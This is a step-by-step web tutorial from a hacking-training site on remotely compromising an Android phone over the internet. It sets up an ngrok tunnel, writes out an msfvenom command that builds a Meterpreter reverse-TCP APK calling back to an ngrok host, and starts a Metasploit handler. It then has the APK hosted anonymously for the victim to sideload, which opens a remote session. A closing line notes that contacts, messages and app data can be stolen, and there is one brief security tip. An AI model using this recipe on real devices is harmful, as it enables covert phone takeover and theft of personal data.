How to Remotely Hack an Android Phone – WAN or Internet hacking

This tutorial is the answer to the most common questions (e.g., Hacking android over WAN) asked by our readers and followers:

  • How to hack android outside the LAN or NAT?
  • Hacking android on the WAN & real world, is it possible?
  • Create an android hacking tutorial over the internet outside the lab environment

This tutorial is designed to show you how you can hack an android phone remotely over the internet. In the previous article of android hacking we did learn how to hack an android device over LAN, but what if we want to get access to a device that is not connected on our network?

Usually in WAN, first, you need to have a Static IP/Hostname, and second, you need to do Port Forwarding to allow your traffic transmission, and we all know that both are so difficult in real-time as we have limited access to ports in a network.

So, what we will do in this scenario, we will set up a secure tunnel using Ngrok.

Ngrok is a tunneling reverse proxy system that establishes tunnels from public endpoint i.e., an internet to a locally running network service. This can help us to create a public HTTP/HTTPS URL for a website running locally in our machine. We don’t need to do any kind of port forwarding while using Ngrok and our network service will eventually expose to the internet with the help of TCP tunneling.

Step by Step Demo:

Step 01: Create an account on Ngrok to download

First you need to install Ngrok in your Kali machine.

Fire up Kali, and browse Ngrok to access its official website: https://ngrok.com/

You have to make an account first. Go to the signup option and fill all the necessary fields.

Create an account on Ngrok to download(CAUTION: Do not use your work email or an email that has access to your private information. It is a best practice to use temporary emails while performing penetration testing. You can also use https://temp-mail.org/en/ to create your account)

After signing up, you can download ngrok installer for Linux.

Setup and Installation

Step 02: Unzip the downloaded file

Go to Download directory where your downloaded file resides.

Unzip the downloaded file

You have to unzip this file. Use unzip command to extract the file.

Step 03: Copy the token, given to your account

After unzipping, you have to save the token that was given to your account.

Copy the token, given to your account

Copy the token from here and paste it in your terminal. Make sure to paste the token in a same directory where you have ngrok.

Copy the token from here and paste it in your terminal

You are all set to use this tool. Type in terminal:

# ./ngrok tcp [Port no:]  (choose any port number on which you want to bind a connection)choose any port number on which you want to bind a connection

choose any port number on which you want to bind a connectionThe forwarding here specifies the TCP tunnel which ngrok has created. The connection has bind to localhost at port 4242. Now we need to generate a malicious payload by using msfvenom.

Step 04: Generate a payload by using msfvenom

Type command:

# msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10900 R > /root/Desktop/android.apk

Type command

Step 05: Start reverse TCP handler

Launch Metasploit-framework

Set exploit as multi/handler, Lhost as localhost i.e 0.0.0.0, Lport as 4242 and run exploit.

Start reverse TCP handler

Step 06: Download the payload on your android phone to get a meterpreter session

To download this payload on android device we will upload it on www.upload.ee, a very useful website to upload your files securely & anonymously .

Download the payload on your android phone to get a meterpreter sessionBrowse this link on your android phone, it will download the zip file of our payload. Unzip it and install it in your phone. (allow option to install it from third-party sources)

After installing and running the app from my android phone, I got a session in my Kali attacking machine.

I got a session in my Kali attacking machine

That is how you can actually exploit an android phone and gain access remotely over the internet rather than on your local area network. After getting a session you know that an attacker can easily get your info, steal your contacts, messages, app data and many more. So, gaining access of your phone is that much easier when you don’t have awareness.

This exploit is tested on Android version 9.0, which is not an old version and currently in use by many users. A healthy tip to secure your Android device is to not install any application from an unknown source, even if you really want to install it, try to read and examine its source code to get an idea whether this file is malicious or not.

Ehacking Staff
With more than 50 global partners, we are proud to count the world’s leading cybersecurity training provider. EH Academy is the brainchild of Ehacking, which has been involved in the field of training since the past Five years and continues to help in creating professional IT experts.

Most Popular

The Complete OSINT Tutorial to Find Personal Information About Anyone

This article mainly focuses on how to discover a person's digital footprint and gather personal data by using open-source intelligence (OSINT). So, in its...

How to find the password of hacked email addresses using OSINT

Open-source intelligence or OSINT is a potent technique, and it can give a lot of valuable information, if implemented correctly with the right strategy...

How to Identify Company’s Hacked Email Addresses Using Maltego & HaveIbeenPawned

This article is part of the Maltego OSINT tutorial, where you will learn to identify the already hacked account, and it’s password using the...

5 Key Vulnerabilities in Global Payroll

The cyber threat against payroll is growing in sophistication and frequency, according to the latest FBI cybercrime report. Many of these attacks exploit fixable...